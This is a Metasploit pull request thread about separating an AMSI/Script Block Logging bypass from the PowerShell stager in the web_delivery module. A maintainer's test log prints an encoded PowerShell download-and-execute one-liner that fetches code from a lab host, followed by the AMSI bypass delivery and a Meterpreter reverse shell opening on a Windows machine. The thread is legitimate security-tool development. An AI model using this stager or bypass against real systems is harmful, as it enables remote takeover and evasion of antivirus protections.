Serve AMSI/SBL separately from psh stager
rapid7/metasploit-framework pull request #12724
Opened 2019-12-14 18:47 UTC by phra

will fix #12723

2019-12-18 05:48 UTC, timwr commented
I can confirm this change works on the latest Windows defender

2020-01-10 09:02 UTC, timwr requested changes

2020-01-10 09:02 UTC, timwr commented on lib/msf/core/exploit/http/server.rb
> +    @service_path = opts['Path'] || random_uri
I think it would be better to implement this without modifying the server mixin. You can just add a new (random) uri in the module and check the `request.uri` in on_request_uri: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer

2020-01-13 20:50 UTC, jmartin-tech requested changes
I agree with @timwr.

2020-02-14 17:44 UTC, timwr commented
@phra I think merging https://github.com/phra/metasploit-framework/pull/4 would remove the need to modify http/server.rb

2020-02-14 22:04 UTC, phra commented
@timwr can you please integrate @jmartin-r7 suggestion on passing a random uri to `add_resource` and remove the `.psh` extension so i can merge https://github.com/phra/metasploit-framework/pull/4 ?

2020-02-17 02:11 UTC, timwr commented
I've updated https://github.com/phra/metasploit-framework/pull/4 to use a random_uri now. Hope it's OK

2020-02-17 02:30 UTC, timwr commented
I'm unsure how to fix the build of the rex-powershell gem which is required for this change:
https://travis-ci.org/rapid7/rex-powershell/builds/651296289?utm_source=github_status&utm_medium=notification

2020-02-17 08:43 UTC, jmartin-r7 commented
@timwr the rex-powershell release version was `0.1.85` and released properly, the error from Travis is about bundler, I will fix the travis config to correct that this week.

2020-02-17 15:12 UTC, phra commented
https://github.com/phra/metasploit-framework/pull/4 was merged.

2020-02-17 16:30 UTC, AllenHK approved these changes

2020-02-19 01:39 UTC, timwr commented
Fixed with https://github.com/rapid7/metasploit-framework/commit/aa1fdb20754bcb65351ed4417afbc3b1ce6f92a0
I forgot to pull your merge commit which is why this wasn't closed automatically.

```
./msfconsole -qr winweb.rc
resource (winweb.rc)> use exploit/multi/script/web_delivery
resource (winweb.rc)> set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
resource (winweb.rc)> set LHOST 192.168.56.1
LHOST => 192.168.56.1
resource (winweb.rc)> set LPORT 4444
LPORT => 4444
resource (winweb.rc)> set target 2
target => 2
resource (winweb.rc)> set URIPATH /w
URIPATH => /w
resource (winweb.rc)> set SSL true
SSL => true
resource (winweb.rc)> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
resource (winweb.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (winweb.rc)> set AutoVerifySession false
AutoVerifySession => false
resource (winweb.rc)> set AutoSystemInfo false
AutoSystemInfo => false
resource (winweb.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (winweb.rc)> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) >
[*] Started HTTPS reverse handler on https://192.168.56.1:4444
[*] Using URL: https://192.168.56.1:8080/w
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABKAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAEoALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABKAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQA6ADgAMAA4ADAALwB3AC8AVwAyAHEARQByAFYAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADEAOgA4ADAAOAAwAC8AdwAnACkAKQA7AA==

msf5 exploit(multi/script/web_delivery) >
[*] 192.168.56.3     web_delivery - Delivering AMSI Bypass (939 bytes)
[*] 192.168.56.3     web_delivery - Delivering Payload (2468 bytes)
[*] https://192.168.56.1:4444 handling request from 192.168.56.3; (UUID: s5sgwhxd) Staging x64 payload (207449 bytes) ...
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49686) at 2020-02-19 09:34:26 +0800

msf5 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > load stdapi
Loading extension stdapi...Success.
meterpreter > pwd
C:\WINDOWS\system32
meterpreter >
```

Thanks @phra and @jmartin-r7

2020-02-19 01:39 UTC, closed without merging

2020-02-20 16:57 UTC, tperry-r7 commented
# Release Notes

This fixes <a href="https://github.com/rapid7/metasploit-framework/issues/12723">issue #12723</a>. Before AMSI/SBL bypass into the <code>web_delivery</code> module for powershell did
not work if prepended in the same response. This separates AMSI/SBL from the powershell stager.